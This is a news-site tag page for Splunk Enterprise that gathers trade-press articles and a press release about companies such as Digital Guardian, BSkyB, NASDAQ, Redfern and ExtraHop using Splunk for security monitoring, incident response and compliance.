7.4 C
Friday, November 24, 2017
Home Tags Splunk Enterprise

Tag: Splunk Enterprise

Hewlett Packard Ventures participated in the Series A round of funding for Hexadite, whose core platform is an automated incident response technology. Security vendor Hexadite has raised $8 million in a Series...
WALTHAM, Mass., June 4th, 2015 - Digital Guardian, the only endpoint security platform purpose built to stop data theft, has released the Digital Guardian App for Splunk. The Digital Guardian App for Splunk harnesses the power of Splunk® Enterprise's big data analytics capabilities to more rapidly detect and respond to insider attacks and advanced threats targeting sensitive data. Digital Guardian solutions provide granular security event data on endpoints and servers (Windows, Mac OS X and Linux) for user behaviour and process activity, including information describing which users and processes are accessing and attempting to exfiltrate sensitive data, a key indicator of malicious activity.Digital Guardian has also developed a Splunk Add-on to natively collect and export the full richness of Digital Guardian data into the Splunk App for Enterprise Security. This add-on is specific to Digital Guardian solutions, with dashboards on Data Classification, Data Egress, Advanced Threat Detection, Alerts, Events, Process Activity, and Operations.With Splunk Enterprise, organisations can collect their data, enrich it and perform real-time analytics, so users can obtain full visibility across all departments and benefit from high-fidelity alerts. Splunk solutions can correlate Indicators of Compromise (IOCs) detected on the network and enable joint customers with Digital Guardian endpoint events to filter out false positives, immediately understand which endpoints have been infected by threats, and prioritise which alerts need immediate attention. Armed with this visibility, users can deploy Digital Guardian's real-time endpoint mitigation rules to block threats and quarantine systems before malicious code can propagate and sensitive data can be exfiltrated. The Splunk platform now gives Digital Guardian the ability to improve incident response and mitigation times for customers.Download the Digital Guardian App for Splunk and Technology Add-on (TA) for Digital Guardian in Splunkbase, the Splunk app store.Executive Perspective"Digital Guardian's data goes beyond endpoint forensics to bring together what users and processes are doing with their most sensitive data on the endpoint," stated Jon Oltsik, senior principal analyst at the Enterprise Strategy Group. "Digital Guardian's heritage in data protection can help organisations align data security and security analytics, enhancing the cybersecurity purview of systems like the Splunk platform.""Analysing machine data from security events on endpoint computers is an important part of the threat detection and response process, and security teams strengthen their security posture by using Splunk solutions to analyse this data collectively with all other data across the organisation," said Haiyan Song, senior vice president of security markets, Splunk. "The alliance between Splunk and Digital Guardian helps our joint customers obtain a greater level of Security Intelligence across organisations.""We understand that customers can be inundated with alerts from multiple security systems. Digital Guardian believes the best way to reduce the threat surface for our customers is to provide them with actionable information about which threats are accessing their most sensitive data," Doug Bailey, chief strategy officer at Digital Guardian. "With Digital Guardian's security event data now in Splunk Enterprise it makes attacks to sensitive data visible so customers can focus their efforts on stopping breaches." About Digital GuardianDigital Guardian is the only data-aware security platform designed to stop data theft. The Digital Guardian platform performs across traditional endpoints, mobile devices and cloud applications to make it easier to see and stop all threats to sensitive data. For more than 10 years, it has enabled data-rich organisations to protect their most valuable assets with an on premise deployment or an outsourced managed security program (MSP). Digital Guardian's unique data awareness and transformative endpoint visibility, combined with behavioral threat detection and response, let you protect data without slowing the pace of your business. To learn more please visit https://digitalguardian.com About Splunk Inc.Splunk Inc. (NASDAQ: SPLK) provides the leading software platform for real-time Operational Intelligence. Splunk® software and cloud services enable organizations to search, monitor, analyze and visualize machine-generated big data coming from websites, applications, servers, networks, sensors and mobile devices. More than 9,500 enterprises, government agencies, universities and service providers in more than 100 countries use Splunk software to deepen business and customer understanding, mitigate cybersecurity risk, prevent fraud, improve service performance and reduce cost. Splunk products include Splunk® Enterprise, Splunk Cloud™, Hunk®, Splunk Light™, Splunk MINT and premium Splunk Apps. To learn more, please visit http://www.splunk.com/company. Social Media: Twitter | LinkedIn | YouTube | FacebookSplunk, Splunk>, Listen to Your Data, The Engine for Machine Data, Hunk, Splunk Cloud, Splunk Light, SPL and Splunk MINT are trademarks and registered trademarks of Splunk Inc. in the United States and other countries.Greg FunaroMobile: +1 978-239-8988gfunaro@digitalguardian.comSource: RealWire
British Sky Broadcasting (BSkyB) has deployed operational intelligence platform Splunk to monitor cyber attacks which are aimed at compromising Sky users' accounts. Mark Debney, principal engineer of developer operations at BSkyB told Computing at splunk.conf in Las Vegas, that BSkyB had created a range of in-house development tools a few years ago in an attempt at securing customer accounts.  The company used that created dashboards using behaviour-based rules but with a raft of new services coming in - such as Now TV - Sky's capacity requirements were growing and the organisation had to make a decision on what the best strategy would be to manage the growth. "It was a case of either investing more money in a development team that could scale these security appliances or looking at another third party that could do the same sort of thing and that's when we stumbled across Splunk," Debney explains. The company also considered using Elasticsearch kibana on the backend and maintaining a development team which would create apps but Debney decided that Splunk was a better fit for Sky's needs. According to Debney, the Splunk proof of concept was put together swiftly on virtual machines. "Even then it performs really well so on dedicated hardware we're expecting really good things," he says.The firm brought in a professional services firm to help with the transition from Sky's development tools to Splunk. "The [BSkyB] guys already had a good idea of what data was in the logs, what rules they wanted and it was pretty easy to translate what they had written in Java code for our own apps into Splunk," he says. The company is now looking into using more real-time dashboards to get visibility for its own development and security teams as well as other teams from operation engineering, capacity management and monitoring. "We want to be able to present the teams with nice dashboards to see what information they need without having to compromise the identity platform's own security," Debney says. Debney believes that Splunk will soon be used across BSkyB, with numerous departments already showing a keen interest in the platform. "I don't think it will be a hard sell, we've been approached by a number of areas within Sky that have looked at Splunk and they're asking us what our experience has been ... there has been a lot of talk about moving to Splunk. "Once we are set up with our two main use cases, I think there will be a big push to see what else we can use it for. If we can get people from the business to access the dashboards themselves then that would be fantastic and I think it's going to go in that direction," says Debney.
The American stock exchange NASDAQ is attempting to shield itself from the security vulnerability known as "Shellshock" or "The Bash Bug", with the help of operational intelligence platform Splunk. The security flaw has been discovered in Linux-based software called Bash - also common on Apple Mac operating systems - and it has been claimed that it could be exploited to take control of any other system that uses Bash software. Despite Linux and Unix vendors, as well as Apple having released patches for the vulnerability, end users could still be vulnerable to the flaw, and recent reports suggest that similar Shellshock-like remote code execution is possible on Windows systems too. At splunk.conf 2014 in Las Vegas, NASDAQ CISO Mark Graff told delegates that the company is using Splunk's platform in a bid to patch and vulernable systems which could be exposed by attackers. The company had previously used Splunk to help with the Heartbleed bug, which was said to allow "anyone on the internet" to read the memory of systems protected by vulnerable versions of OpenSSL. When the Heartbleed bug became public knowledge, Graff suggested that it became a race between attackers trying to make use of the flaw, and the defence trying to patch it in time. NASDAQ built a dashboard using Splunk on the day that Heartbleed was made public. "We wrote it on the same day and ran it, and it's really fundamental to our defence," Gradd explained. He said that NASDAQ‘s systems are always targeted with attacks, and in this case it had 500 outward facing websites which were vulnerable. "We wanted to track if someone was coming after us and see which system they were trying to get into, and find out whether the system is vulnerable or not and whether it can be patched if it is," Graff said. He presented the dashboard that one of NASDAQ's developers built using Splunk, with charts showing the number of vulnerable systems against the number of attacks, and a detector to highlight which systems could be hacked. "I knew they were going to come after us but the question was whether we could beat them," Graff said. The company eventually got its vulnerable systems patched and according to Graff, NASDAQ "beat" the attackers. The company will be using Splunk in a similar way to help it with Shellshock, which has been deemed "worse than Heartbleed". NASDAQ had initially implemented Splunk as a security information and event management (SIEM) tool, and is now working on refining its applications and the way it responds to intrusions. Graff said that he hopes "to get to the point where the enterprise will defend itself".
Travel management company Redfern has deployed Splunk for proactive monitoring to comply with the government’s Information Assurance programme. Splunk was deployed to support a government contract through which Redfern is supplying a domestic travel booking service to UK government departments including HM Revenue and Customs, the Department of Education, Defra, the Department of Health and the Home Office. Redfern deployed Splunk to monitor the critical infrastructure that underpins the Government Travel Booking Service. It is used to look for events in relation to unauthorised access or government data leaving the organisation. To meet the requirements of the contract, Usman Hamid, Redfern's head of IT, said the company needed to support GPG13 (Good Practice Guide 13) with the government’s Information Assurance (IA) initiative. He said: "Redfern did not have a central logging tool, but we knew Splunk could be used for basic monitoring." By implementing Splunk, Redfern was able to standardise on one set of tools, rather than implementing a specialist log monitoring tool, he said. Hamid previously worked for shopping channel QVC, which trialled Splunk. He also saw how it was deployed at OnHotels.com, which implemented it for proactive monitoring and control. "We liked the way we could store all the data and use Splunk to present it back in a meaningful way," he said. "Splunk’s logging, searching, reporting and alerting technology was already well proven since it is widely used throughout local government and the Cabinet Office. Kevin Tunsley of EQALIS [Splunk’s leading UK partner] gave us a full demonstration of Splunk, the GPG13 compliance app and showed us its potential for providing complete operational visibility and intelligence. We were impressed by Splunk’s simplicity and flexibility to be more than just a monitoring solution." Hamid was also keen to use Splunk for operational management, which is how the tool is used at John Lewis. He added: "Many people look at tools like Splunk only as a means of centralising all the logs from their IT estate into one place and then just leaving it, in effect a tick-box for compliance. What I saw in Splunk was the ability to actually harvest that data into something more meaningful, to allow for better decision-making through operational intelligence. "We could track unique [customer] journeys in real time on the website by using Splunk in operations." Redfern used EQALIS, an Accumuli company, to implement Splunk. The software was deployed in five days. Email Alerts Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox. By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Read More Related content from ComputerWeekly.com RELATED CONTENT FROM THE TECHTARGET NETWORK
ExtraHop teams with Splunk to deliver a new compliance and security product for tracking wire data and using the Splunk operational intelligence platform. LAS VEGAS—ExtraHop Networks, a provider of analytics for wire data or data in motion, joined forces with Splunk to deliver a new compliance and security offering. The product provides pervasive, context-aware monitoring that imparts intelligent compliance and security, ExtraHop officials said.

The ExtraHop compliance and security offering provides correlated, cross-tier visibility and anomaly detection that complements intrusion prevention systems (IPS), intrusion detection systems (IDS) and Security Information and Event Management (SIEM) systems. Moreover, the new product is extensible and demonstrates the programmability and ease of ExtraHop integration with security platforms. In addition, ExtraHop’s integration with Splunk Enterprise transforms real-time security-related wire data into machine data for in-depth visualization, enabling IT, compliance, and security teams to easily pinpoint the system, application or infrastructure element in which a security event is occurring without using agents or offline packet capture. ExtraHop demonstrated the compliance and security offering at Splunk .conf2013, Splunk’s annual user conference here. “As security threats, including zero-day attacks that exploit previously unknown vulnerabilities, become increasingly varied and sophisticated, real-time monitoring across all components of the application delivery chain is becoming a crucial first line of defense,” said Jesse Rothstein, CEO of ExtraHop, in a statement. “With the ExtraHop compliance and security solution and our integration with Splunk Enterprise, enterprise security teams are armed with a highly scalable solution designed to detect potential security events as they happen. With Splunk Enterprise, these anomalies can be easily visualized, enabling organizations to pinpoint the source before a serious breach occurs and prove that they have had adequate controls in place.” The ExtraHop compliance and security solution delivers continuous, real-time auditing and anomaly detection across the entire application delivery chain, analyzing all wire data, including encrypted traffic, to deliver visibility and intelligence that mitigates risk and helps ensure compliance with both internal policies and regulations such as the Health Insurance Portability and Accountability Act (HIPAA), Payment Card Industry Data Security Standard (PCI-DSS) and Sarbanes-Oxley (SOX). “Part of the answer to the seemingly insurmountable problem of how to identify attacks without signature-based mechanisms lies in pervasive monitoring to identify meaningful deviations from normal behavior to infer malicious intent,” wrote Neil MacDonald, vice president and Gartner Fellow, in his May 2013 report titled Prevention Is Futile in 2020: Protect Information Via Pervasive Monitoring and Collective Intelligence. “If you assume systems will be compromised with advanced targeted threats, then information security efforts need to shift to detailed, pervasive and context-aware monitoring to detect these threats.” The ExtraHop compliance and security offering provides encryption auditing, which identifies all Secure Sockets Layer (SSL) transactions and certificates used by servers and clients, including those using weak keys and cipher suites, and tracks certificates that are about to expire for proactive remediation. Encryption auditing makes it easier to prove that all sensitive data is actually being encrypted in flight and that keys and ciphers are the correct strength. Also, monitoring for locked-down virtual desktop environments enables users to track all ICA communications and provides continuous monitoring of any data passing over protected channels, with per-user and per-client details so that IT teams can identify users violating policy.

For example, ExtraHop continuously monitors VDI channels such as print and USB, and it sends an alert if any of these channels become active on unauthorized machines.

Splunk Enterprise